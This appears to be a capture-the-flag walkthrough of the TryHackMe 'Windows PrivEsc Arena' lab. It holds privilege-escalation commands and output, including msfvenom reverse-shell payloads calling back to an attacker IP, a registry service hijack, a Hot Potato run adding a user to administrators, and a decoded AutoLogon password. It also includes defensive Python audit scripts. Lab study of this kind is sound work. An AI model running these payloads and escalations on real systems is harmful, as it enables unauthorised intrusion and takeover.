
Windows PrivEsc Arena

Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. RDP is open. Your credentials are user:password321


Last updated 2 years ago

Room Attributes
Subscription Required: False [Free]
Type: Walkthroughs
Difficulty: Medium
Tags: Security, Windows, PrivEsc

Task 1 Connecting to TryHackMe network

Connect to TryHackMe's VPN.

No answer needed

Task 2 Deploy the vulnerable machine

Deploy the machine and log into the user account via RDP

rdesktop TARGET_IP:3389 -u user -p password321

No answer needed

Open a command prompt and run 'net user'. Who is the other non-default user on the machine?

Answer: TCM

Task 3 Registry Escalation - Autorun

C:\Users\user>C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"

Accesschk v6.10 - Reports effective permissions for securable objects
Copyright (C) 2006-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\Program Files\Autorun Program\program.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Everyone
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS

meterpreter > getuid
Server username: TCM-PC\TCM

No answer needed

Task 4 Registry Escalation - AlwaysInstallElevated

PS C:\Users\TCM> Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl

Path   : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\regsvc
Owner  : BUILTIN\Administrators
Group  : NT AUTHORITY\SYSTEM
Access : Everyone Allow  ReadKey
         NT AUTHORITY\INTERACTIVE Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
Audit  :
Sddl   : O:BAG:SYD:P(A;CI;KR;;;WD)(A;CI;KA;;;IU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)

No answer needed

Task 5 Service Escalation - Registry

C:\Users\TCM>reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
The operation completed successfully.

C:\Users\TCM>sc start regsvc

SERVICE_NAME: regsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 3400
        FLAGS              :

No answer needed

Task 6 Service Escalation - Executable Files

No answer needed

Task 7 Privilege Escalation - Startup Applications

C:\Users\TCM>icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup BUILTIN\Users:(F)
    TCM-PC\TCM:(I)(OI)(CI)(DE,DC)
    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
    BUILTIN\Administrators:(I)(OI)(CI)(F)
    BUILTIN\Users:(I)(OI)(CI)(RX)
    Everyone:(I)(OI)(CI)(RX)

kali@kali  ~/Documents/THM/windowsprivescarena  msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.12.198 -f exe -o x.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: x.exe

C:\Users\user>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members
-------------------------------------------------------------------------------
Administrator
TCM
user
The command completed successfully.

No answer needed

Task 8 Service Escalation - DLL Hijacking

No answer needed

Task 9 Service Escalation - binPath

C:\Users\user>C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc

Accesschk v6.10 - Reports effective permissions for securable objects
Copyright (C) 2006-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

daclsvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW Everyone
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL

No answer needed
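The accesschk outputs in Tasks 3 and 9 both show the same defect: a write-capable right granted to Everyone on an object that runs as SYSTEM. This added Python audit (not part of the room) parses that output format and reports such grants; the two embedded samples are copied from the outputs above, and the LOW_PRIV and WRITE_RIGHTS sets are my choice of what to flag.

```python
"""Audit Sysinternals accesschk -v output for write access held by low-privileged principals."""
import re

# Identities that every local or interactive user effectively holds (audit policy, my choice).
LOW_PRIV = {"Everyone", "BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users",
            "NT AUTHORITY\\INTERACTIVE"}
# Rights that let such a user replace a service binary or repoint a service (Tasks 3 and 9).
WRITE_RIGHTS = {"FILE_ALL_ACCESS", "FILE_GENERIC_WRITE", "FILE_WRITE_DATA", "WRITE_DAC",
                "WRITE_OWNER", "SERVICE_ALL_ACCESS", "SERVICE_CHANGE_CONFIG"}
BANNER = ("Accesschk v", "Copyright", "Sysinternals")

def parse_accesschk(text):
    """Return {object: {principal: set(rights)}} from `accesschk -v` output."""
    objects, aces, principal = {}, None, None
    for line in text.splitlines():
        if not line.strip() or line.startswith(BANNER):
            continue
        ace = re.match(r"^  ([RW ]{2}) (\S.*)$", line)   # e.g. "  RW Everyone"
        if not line.startswith(" "):                     # object line: file path or service name
            aces, principal = objects.setdefault(line.strip(), {}), None
        elif ace and aces is not None:
            principal = ace.group(2).strip()
            aces.setdefault(principal, set())
        elif line.startswith("        ") and principal:  # a right granted to the last principal
            aces[principal].add(line.strip())
    return objects

def weak_write_access(text):
    """(object, principal, right) for every write-capable right held by a low-priv identity."""
    return [(obj, who, r)
            for obj, aces in parse_accesschk(text).items()
            for who, rights in aces.items() if who in LOW_PRIV
            for r in sorted(rights & WRITE_RIGHTS)]

# Service DACL copied from the Task 9 output above (trimmed to the relevant lines).
SERVICE_OUTPUT = """Accesschk v6.10 - Reports effective permissions for securable objects

daclsvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\\SYSTEM
        SERVICE_ALL_ACCESS
  RW Everyone
        SERVICE_QUERY_STATUS
        SERVICE_CHANGE_CONFIG
"""
# File DACL copied from the Task 3 output above.
FILE_OUTPUT = """C:\\Program Files\\Autorun Program\\program.exe
  RW Everyone
        FILE_ALL_ACCESS
"""
```

A finding means the DACL must be tightened (remove the grant with icacls or sc sdset) rather than relied on; SYSTEM and Administrators keeping full access is expected and is not reported.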

Task 10 Service Escalation - Unquoted Service Paths

C:\Users\user>sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Unquoted Path Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

No answer needed
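The `sc qc` output above is the whole finding: BINARY_PATH_NAME has spaces and no quotes, so the service control manager may try shorter paths first. This added Python check (not the room's code) extracts the path, lists the executables Windows would probe before the real one so their directories' write ACLs can be verified, and produces the quoted binPath value used to remediate with `sc config <svc> binPath= ...`; the `audit` wrapper and the embedded sample (copied from above) are mine.

```python
"""Flag services whose BINARY_PATH_NAME is unquoted and contains spaces (Task 10)."""
import re

def binary_path(sc_qc_output):
    """Pull BINARY_PATH_NAME out of `sc qc <service>` output (wrapped lines already joined)."""
    m = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", sc_qc_output)
    return m.group(1).strip() if m else None

def unquoted_candidates(path):
    """Executables Windows would try, in order, before reaching the real one.
    CreateProcess cuts an unquoted string at each space and appends .exe; an empty
    list means the path is quoted or space-free and therefore not affected."""
    if path.startswith('"') or " " not in path:
        return []
    tokens, cands = path.split(" "), []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):   # past the executable: the rest are arguments
            break
        cands.append(prefix + ".exe")
    return cands

def quoted_binpath(path):
    """Remediation value for `sc config <svc> binPath= ...`: the executable in quotes."""
    m = re.match(r'^"?(.+?\.exe)"?(.*)$', path, re.IGNORECASE)
    return '"%s"%s' % (m.group(1), m.group(2)) if m else path

def audit(sc_qc_output):
    """Return (is_vulnerable, candidate executables to check, fixed binPath) for one service."""
    path = binary_path(sc_qc_output)
    cands = unquoted_candidates(path)
    return (bool(cands), cands, quoted_binpath(path))

# Copied from the `sc qc unquotedsvc` output above.
SC_QC = """SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        BINARY_PATH_NAME   : C:\\Program Files\\Unquoted Path Service\\Common Files\\unquotedpathservice.exe
        SERVICE_START_NAME : LocalSystem
"""
```

Each candidate's parent directory must be non-writable by standard users (the default for C:\ and C:\Program Files); if any is writable, quoting the path is the fix, not tightening the directory alone.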

Task 11 Potato Escalation - Hot Potato

Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\Users\user> powershell.exe -nop -ep bypass
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\Users\user> Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
PS C:\Users\user> Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
2022-06-26T13:24:46 - Tater (Hot Potato Privilege Escalation) started
Local IP Address = 10.10.99.186
Spoofing Hostname = WPAD
Windows Defender Trigger Enabled
Real Time Console Output Enabled
Run Stop-Tater to stop Tater early
Use Get-Command -Noun Tater* to show available functions
Press any key to stop real time console output

2022-06-26T13:24:46 - Flushing DNS resolver cache
2022-06-26T13:24:46 - Waiting for incoming HTTP connection
2022-06-26T13:24:48 - Starting NBNS spoofer to resolve WPAD to 127.0.0.1
2022-06-26T13:24:50 - WPAD has been spoofed to 127.0.0.1
2022-06-26T13:24:50 - Running Windows Defender signature update
2022-06-26T13:24:51 - HTTP request for /wpad.dat received from 127.0.0.1
2022-06-26T13:24:55 - Attempting to redirect to http://localhost:80/gethashes and trigger relay
2022-06-26T13:24:55 - HTTP request for http://download.windowsupdate.com/v9/windowsupdate/redir/muv4wuredir.cab?2206261724 received from 127.0.0.1
2022-06-26T13:24:59 - HTTP request for /GETHASHES received from 127.0.0.1
2022-06-26T13:25:00 - HTTP to SMB relay triggered by 127.0.0.1
2022-06-26T13:25:00 - Grabbing challenge for relay from 127.0.0.1
2022-06-26T13:25:00 - Received challenge DA38D881138086D0 for relay from 127.0.0.1
2022-06-26T13:25:00 - Providing challenge DA38D881138086D0 for relay to 127.0.0.1
2022-06-26T13:25:01 - Sending response for \ for relay to 127.0.0.1
2022-06-26T13:25:01 - HTTP to SMB relay authentication successful for \ on 127.0.0.1
2022-06-26T13:25:01 - SMB relay service TGPVBCIOUBVVLFQRJQFL created on 127.0.0.1
2022-06-26T13:25:01 - Command likely executed on 127.0.0.1
2022-06-26T13:25:01 - SMB relay service TGPVBCIOUBVVLFQRJQFL deleted on 127.0.0.1
2022-06-26T13:25:02 - Stopping HTTP listener
2022-06-26T13:25:05 - Tater was successful and has exited
PS C:\Users\user> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members
-------------------------------------------------------------------------------
Administrator
TCM
user
The command completed successfully.

No answer needed

Task 12 Password Mining Escalation - Configuration Files

<AutoLogon>
    <Password>
        <Value>cGFzc3dvcmQxMjM=</Value>
        <PlainText>false</PlainText>
    </Password>
    <Enabled>true</Enabled>
    <Username>Admin</Username>
</AutoLogon>

Answer: password123
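The fragment above stores the AutoLogon password Base64-encoded, which is no protection at all. This added Python audit (not the room's code) finds AutoLogon blocks in an unattend.xml or sysprep answer file and recovers the stored value so leftover credentials can be removed from images; the THM fragment is copied from above, while the second sample, in the real sysprep layout (namespaced, UTF-16LE with a "Password" suffix), is constructed.

```python
"""Audit an unattend.xml / sysprep answer file for AutoLogon credentials (Task 12)."""
import base64
import xml.etree.ElementTree as ET

def _local(tag):
    """Strip the urn:schemas-microsoft-com:unattend namespace that real answer files use."""
    return tag.rsplit("}", 1)[-1]

def decode_unattend_password(value, plain_text):
    """Recover the stored password. Sysprep writes base64(UTF-16LE(password + "Password"));
    the room's file above stores base64 of the bare password, so both forms are handled."""
    if plain_text:
        return value
    raw = base64.b64decode(value)
    try:
        text = raw.decode("utf-16-le")
        if text.endswith("Password"):
            return text[:-len("Password")]
    except UnicodeDecodeError:       # odd byte count: not UTF-16, fall through
        pass
    return raw.decode("utf-8", errors="replace")

def find_autologon(xml_text):
    """Return [(username, password, enabled)] for every AutoLogon element in the file."""
    found = []
    for node in ET.fromstring(xml_text).iter():
        if _local(node.tag) != "AutoLogon":
            continue
        child = {_local(c.tag): c for c in node}
        pw = {_local(c.tag): (c.text or "").strip() for c in child["Password"]}
        plain = pw.get("PlainText", "true").lower() == "true"
        found.append(((child["Username"].text or "").strip(),
                      decode_unattend_password(pw["Value"], plain),
                      (child["Enabled"].text or "").strip().lower() == "true"))
    return found

# The fragment shown above in Task 12.
THM_FRAGMENT = """<AutoLogon>
    <Password>
        <Value>cGFzc3dvcmQxMjM=</Value>
        <PlainText>false</PlainText>
    </Password>
    <Enabled>true</Enabled>
    <Username>Admin</Username>
</AutoLogon>"""

# Constructed sample in the real sysprep layout (namespace + UTF-16LE "Password" suffix).
SYSPREP_SAMPLE = ('<unattend xmlns="urn:schemas-microsoft-com:unattend"><settings pass="oobeSystem">'
                  '<component name="Microsoft-Windows-Shell-Setup"><AutoLogon><Password><Value>%s</Value>'
                  '<PlainText>false</PlainText></Password><Enabled>true</Enabled>'
                  '<Username>Administrator</Username></AutoLogon></component></settings></unattend>'
                  % base64.b64encode("Hunter2Password".encode("utf-16-le")).decode())
```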

Task 13 Password Mining Escalation - Memory

No answer needed

Task 14 Privilege Escalation - Kernel Exploits

kali@kali  ~/Documents/THM/windowsprivescarena  msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.9.12.198 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.99.186 - Collecting local exploits for x86/windows...
[*] 10.10.99.186 - 40 exploit checks are being tried...
[+] 10.10.99.186 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.10.99.186 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.99.186 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.99.186 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.99.186 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.99.186 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.99.186 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.99.186 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.99.186 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.99.186 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[+] 10.10.99.186 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.

No answer needed

References
TryHackMe | Windows PrivEsc Arena: https://tryhackme.com/room/windowsprivescarena
rdesktop | Kali Linux Tools: https://www.kali.org/tools/rdesktop/
CyberChef (From Base64 recipe for the Task 12 value): https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)&input=Y0dGemMzZHZjbVF4TWpNPQ